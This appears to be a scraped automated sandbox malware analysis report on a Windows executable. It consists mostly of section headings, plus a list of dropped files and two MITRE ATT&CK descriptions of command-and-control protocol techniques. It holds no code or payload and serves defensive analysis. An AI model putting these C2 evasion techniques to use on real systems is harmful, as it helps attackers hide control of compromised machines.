Warning!

Windows Analysis Report fHkdf4WB7zhMcqP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fHkdf4WB7zhMcqP.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vssfbkdOErXuYi.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\6-G0991eL2

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4j21uuzc.fih.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jtlxl2b.jpv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akhtnhgc.noa.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzc3xk0y.5d2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_movg52gm.l0n.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyetvcq4.tty.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r10l5ini.33y.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zn1zrun4.dw3.psm1

Windows Analysis Report
fHkdf4WB7zhMcqP.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre